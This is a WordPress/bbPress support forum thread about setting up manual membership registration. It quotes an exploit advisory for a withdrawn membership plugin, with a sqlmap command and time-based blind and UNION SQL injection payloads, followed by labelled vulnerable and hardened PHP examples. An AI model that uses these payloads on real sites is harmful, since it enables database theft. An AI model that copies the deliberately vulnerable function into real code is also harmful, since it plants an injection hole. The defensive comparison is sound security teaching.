My virus checker doesn't like the sploitus website – what is the nature of the exploitation?
The plugin was (luckily) not installed. We had just decided to use it, then we saw that WordPress had taken it down from their plugin site.
The exploit seems to be an SQL Injection.
# 1. Description
The GET parameters "search" and "sidx" do not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt --dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
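For readers wondering what the fix for a finding like this looks like on the plugin side, here is an added example (not the plugin's own code, and not from the advisory) contrasting the pattern the description implies with a hardened version. It assumes a custom table `{$wpdb->prefix}badges` with columns `id`, `title` and `created`, and a badge list handler that receives the `search`, `sidx` and `sord` parameters shown in the sqlmap output; the function names and the table are hypothetical.

```php
<?php
// Added example, not the plugin's own code. Assumes a custom table
// {$wpdb->prefix}badges (columns id, title, created) and a badge list
// handler that receives the GET parameters search, sidx and sord.

// Vulnerable pattern: the search term and the sort column are concatenated
// straight into the SQL string, so a crafted "search" value changes the
// query itself (time-based blind and UNION payloads both work against this).
function badges_get_list_vulnerable( $search, $sidx, $sord ) {
    global $wpdb;
    $table = $wpdb->prefix . 'badges';
    $sql   = "SELECT id, title, created FROM {$table}
              WHERE title LIKE '%{$search}%'
              ORDER BY {$sidx} {$sord}";
    return $wpdb->get_results( $sql );
}

// Hardened form: the search value is bound through $wpdb->prepare() as a
// string literal, and the ORDER BY column and direction, which cannot be
// bound as parameters, are restricted to a fixed allow-list.
function badges_get_list_safe( $search, $sidx, $sord ) {
    global $wpdb;
    $table = $wpdb->prefix . 'badges';

    // sidx: only known column names survive; anything else falls back to id.
    $allowed_columns = array( 'id', 'title', 'created' );
    if ( ! in_array( $sidx, $allowed_columns, true ) ) {
        $sidx = 'id';
    }
    // sord: only the two literal keywords are ever emitted.
    $sord = ( 'asc' === strtolower( (string) $sord ) ) ? 'ASC' : 'DESC';

    // esc_like() escapes % and _ so the user cannot widen the LIKE pattern;
    // prepare() then quotes the whole value as one string parameter.
    $like = '%' . $wpdb->esc_like( $search ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT id, title, created FROM {$table} WHERE title LIKE %s ORDER BY {$sidx} {$sord}",
        $like
    );
    return $wpdb->get_results( $sql );
}

// Hypothetical call site inside the admin AJAX handler. The nonce and
// capability checks limit who can reach the query; they are not a substitute
// for the prepared statement and allow-list above.
function badges_ajax_list_handler() {
    check_ajax_referer( 'supsystic-membership', 'wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', '', array( 'response' => 403 ) );
    }
    $rows = badges_get_list_safe(
        isset( $_GET['search'] ) ? wp_unslash( $_GET['search'] ) : '',
        isset( $_GET['sidx'] ) ? wp_unslash( $_GET['sidx'] ) : 'id',
        isset( $_GET['sord'] ) ? wp_unslash( $_GET['sord'] ) : 'desc'
    );
    wp_send_json_success( $rows );
}
```

The two things to check when reviewing a plugin for this class of bug are whether every user-controlled value reaches the query through `$wpdb->prepare()` placeholders, and whether the parts that cannot be placeholders (column names, sort direction, table names) are compared against a hard-coded list rather than merely escaped.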
If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.
As far as the bbPress part goes:
Forums set to public are viewable by anyone.
Forums set to private are viewable only by registered users.
So if you set forums to private they will not appear to unregistered users; they are only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums), then only registered users will be able to post.
bbPress just uses WordPress users for login and registration with an extra bbPress parameter, so you can just use WordPress to set up users.
If you are going to have manual registration, then you turn off 'anyone can register' in WordPress (dashboard>settings>general>membership), and create a form using a form plugin (e.g. Contact Form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.
The approver would then add the user (2 minutes or less).
As far as wordpress page content then use a plugin that restricts content to registered users such as
Content Control – User Access Restriction Plugin
Finally you would use
bbPress Messages
to allow users to message each other – don't worry that this plugin has not been updated for a while – it is stable and works.
As far as I can see that would meet your requirements list.
Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!
You saved me! Thanks. 🙂
I’ve implemented your solution and it works pretty good so far. Thanks again.
When I go to the URL of a private forum (while not logged in) it just throws a 404. Can I somehow redirect the user to a login page?
bbp style pack
once activated go to
dashboard>settings>bbp style pack>Subscription Emails and there is a box to tick item 2 auto login and the appropriate login